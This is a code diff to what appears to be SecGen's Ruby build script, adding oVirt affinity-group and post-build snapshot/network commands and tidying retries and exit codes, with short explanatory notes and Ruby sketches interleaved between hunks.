--- a/secgen.rb
+++ b/secgen.rb
@@ -46,12 +46,15 @@ def usage
--ovirtauthz [ovirt authz]
--ovirt-cluster [ovirt_cluster]
--ovirt-network [ovirt_network_name]
+ --ovirt-affinity-group [ovirt_affinity_group_name]
COMMANDS:
run, r: Builds project and then builds the VMs
build-project, p: Builds project (vagrant and puppet config), but does not build VMs
build-vms, v: Builds VMs from a previously generated project
(use in combination with --project [dir])
+ ovirt-post-build: Only performs the oVirt actions that normally follow a successful VM build
+ (snapshots and networking)
create-forensic-image: Builds forensic images from a previously generated project
(can be used in combination with --project [dir])
list-scenarios: Lists all scenarios that can be used with the --scenario option
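Assuming the option and command names shown in the usage text above, the new `ovirt-post-build` command and `--ovirt-affinity-group` flag might be combined like this (the scenario and project paths are hypothetical):

```shell
# Hypothetical invocation: re-run only the oVirt post-build steps
# (network assignment, affinity group, snapshot) for a project that
# has already been built.
ruby secgen.rb --scenario scenarios/default_scenario.xml \
               --project projects/SecGen_project \
               --ovirt-network vm_network \
               --ovirt-affinity-group build_group \
               --snapshot \
               ovirt-post-build
```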
@@ -80,7 +83,7 @@ def build_config(scenario, out_dir, options)
}
Print.info "Creating project: #{out_dir}..."
- # create's vagrant file / report a starts the vagrant installation'
+ # creates Vagrantfile and other outputs and starts the vagrant installation
creator = ProjectFilesCreator.new(systems, out_dir, scenario, options)
creator.write_files
@@ -89,14 +92,14 @@ end
# Builds the vm via the vagrant file in the project dir
# @param project_dir
-def build_vms(project_dir, options)
+def build_vms(scenario, project_dir, options)
unless project_dir.include? ROOT_DIR
Print.info 'Relative path to project detected'
project_dir = "#{ROOT_DIR}/#{project_dir}"
Print.info "Using #{project_dir}"
end
- scenario = project_dir + '/scenario.xml'
Print.info "Building project: #{project_dir}"
system = ''
@@ -109,7 +112,7 @@ def build_vms(project_dir, options)
end
# if deploying to ovirt, when things fail to build, set the retry_count
- retry_count = OVirtFunctions::provider_ovirt?(options) ? 10 : 0
+ retry_count = OVirtFunctions::provider_ovirt?(options) ? 2 : 0
successful_creation = false
while retry_count and !successful_creation
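The retry loop above counts `retry_count` down on each failed attempt. Note that in Ruby even `0` and negative integers are truthy, so the countdown only stops the loop if it is compared explicitly; a minimal standalone sketch of a bounded retry loop (names are illustrative, not SecGen's API):

```ruby
# Bounded retry sketch: loop until success or the retry budget is spent.
# An explicit comparison is needed because 0 is truthy in Ruby.
retry_count = 2             # mirrors the oVirt retry budget above
successful_creation = false
attempts = 0
while retry_count >= 0 && !successful_creation
  attempts += 1             # a real build attempt would go here
  retry_count -= 1
end
attempts # => 3 (the initial try plus two retries)
```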
@@ -167,18 +170,39 @@ def build_vms(project_dir, options)
end
else # TODO: elsif vagrant_output[:exception].type == ProcessHelper::TimeoutError >destroy individually broken vms as above?
Print.err 'Vagrant up timeout, destroying VMs and retrying...'
- GemExec.exe('vagrant', project_dir, 'destroy -f')
+ # GemExec.exe('vagrant', project_dir, 'destroy -f')
end
else
Print.err 'Error provisioning VMs, destroying VMs and exiting SecGen.'
- GemExec.exe('vagrant', project_dir, 'destroy -f')
+ # GemExec.exe('vagrant', project_dir, 'destroy -f')
exit 1
end
end
retry_count -= 1
end
- if successful_creation && options[:snapshot]
+ if successful_creation
+ ovirt_post_build(options, scenario, project_dir)
+ else
+ Print.err "Failed to build VMs"
+ exit 1
+ end
+end
+
+# actions taken on the VMs after Vagrant has built them:
+# network assignment, affinity groups, and snapshots
+def ovirt_post_build(options, scenario, project_dir)
+ Print.std 'Taking oVirt post-build actions...'
+ if options[:ovirtnetwork]
+ Print.info 'Assigning network(s) of VM(s)'
+ OVirtFunctions::assign_networks(options, scenario, get_vm_names(scenario))
+ end
+ if options[:ovirtaffinitygroup]
+ Print.info 'Assigning affinity group of VM(s)'
+ OVirtFunctions::assign_affinity_group(options, scenario, get_vm_names(scenario))
+ end
+ if options[:snapshot]
Print.info 'Creating a snapshot of VM(s)'
+ sleep(20) # give oVirt/VirtualBox a chance to save any VM config changes before creating the snapshot
if OVirtFunctions::provider_ovirt?(options)
OVirtFunctions::create_snapshot(options, scenario, get_vm_names(scenario))
else
@@ -249,7 +273,7 @@ end
# Runs methods to run and configure a new vm from the configuration file
def run(scenario, project_dir, options)
build_config(scenario, project_dir, options)
- build_vms(project_dir, options)
+ build_vms(scenario, project_dir, options)
end
def default_project_dir
@@ -283,17 +307,25 @@ def delete_all_projects
FileUtils.rm_r(Dir.glob("#{PROJECTS_DIR}/*"))
end
+# returns an array containing the system names from the scenario
def get_vm_names(scenario)
vm_names = []
parser = Nori.new
- scenario_hash = parser.parse(File.read(scenario))['scenario']
+ scenario_hash = parser.parse(File.read(scenario))
+ Print.debug "scenario_hash: #{scenario_hash}"
+ if scenario_hash.key?('scenario') # workaround for a parsing quirk
+ scenario_hash = scenario_hash['scenario']
+ end
if scenario_hash['system'].is_a? Array
scenario_hash['system'].each do |system|
vm_names << system['system_name']
end
- else
+ elsif scenario_hash['system'].is_a? Hash
vm_names << scenario_hash['system']['system_name']
+ else
+ Print.debug "Not an array or hash?: #{scenario_hash['system']}"
end
+ Print.debug vm_names.to_s
vm_names
end
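The Array/Hash branching above exists because XML-to-hash parsers such as Nori return an Array when an element like `system` is repeated, but a bare Hash when it occurs only once. A standalone sketch of the same normalisation, without the Nori dependency (the helper name is illustrative):

```ruby
# Mirrors get_vm_names' branching: accept either the Array form
# (several <system> elements) or the Hash form (a single one).
def vm_names_from(system_value)
  case system_value
  when Array then system_value.map { |s| s['system_name'] }
  when Hash  then [system_value['system_name']]
  else []   # e.g. nil when the scenario has no systems at all
  end
end

multi  = [{ 'system_name' => 'web_server' }, { 'system_name' => 'desktop' }]
single = { 'system_name' => 'desktop' }

vm_names_from(multi)  # => ["web_server", "desktop"]
vm_names_from(single) # => ["desktop"]
```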
@@ -343,6 +375,7 @@ opts = GetoptLong.new(
['--ovirtauthz', GetoptLong::REQUIRED_ARGUMENT],
['--ovirt-cluster', GetoptLong::REQUIRED_ARGUMENT],
['--ovirt-network', GetoptLong::REQUIRED_ARGUMENT],
+ ['--ovirt-affinity-group', GetoptLong::REQUIRED_ARGUMENT],
['--snapshot', GetoptLong::NO_ARGUMENT],
)
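GetoptLong, the stdlib parser used above, consumes flags from `ARGV`; a minimal sketch of how the new `--ovirt-affinity-group` option would be picked up (`ARGV` is stubbed here purely for illustration):

```ruby
require 'getoptlong'

# Stub ARGV as if the user had passed the new flag on the command line.
ARGV.replace(['--ovirt-affinity-group', 'build_group_a'])

opts = GetoptLong.new(
  ['--ovirt-affinity-group', GetoptLong::REQUIRED_ARGUMENT]
)

options = {}
opts.each do |opt, arg|
  options[:ovirtaffinitygroup] = arg if opt == '--ovirt-affinity-group'
end

options[:ovirtaffinitygroup] # => "build_group_a"
```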
@@ -431,6 +464,9 @@ opts.each do |opt, arg|
when '--ovirt-network'
Print.info "Ovirt Network Name : #{arg}"
options[:ovirtnetwork] = arg
+ when '--ovirt-affinity-group'
+ Print.info "Ovirt Affinity Group : #{arg}"
+ options[:ovirtaffinitygroup] = arg
when '--snapshot'
Print.info "Taking snapshots when VMs are created"
options[:snapshot] = true
@@ -438,7 +474,7 @@ opts.each do |opt, arg|
else
Print.err "Argument not valid: #{arg}"
usage
- exit
+ exit 1
end
end
@@ -446,7 +482,7 @@ end
if ARGV.length < 1
Print.err 'Missing command'
usage
- exit
+ exit 1
end
# process command
@@ -459,26 +495,30 @@ case ARGV[0]
build_config(scenario, project_dir, options)
when 'build-vms', 'v'
if project_dir
- build_vms(project_dir, options)
+ build_vms(scenario, project_dir, options)
else
Print.err 'Please specify project directory to read'
usage
- exit
+ exit 1
end
when 'create-forensic-image'
image_type = options.has_key?(:forensic_image_type) ? options[:forensic_image_type] : 'raw';
if project_dir
- build_vms(project_dir, options)
+ build_vms(scenario, project_dir, options)
make_forensic_image(project_dir, nil, image_type)
else
project_dir = default_project_dir unless project_dir
build_config(scenario, project_dir, options)
- build_vms(project_dir, options)
+ build_vms(scenario, project_dir, options)
make_forensic_image(project_dir, nil, image_type)
end
+ when 'ovirt-post-build'
+ ovirt_post_build(options, scenario, project_dir)
+ exit 0
+
when 'list-scenarios'
list_scenarios
exit 0
@@ -495,5 +535,5 @@ case ARGV[0]
else
Print.err "Command not valid: #{ARGV[0]}"
usage
- exit
+ exit 1
end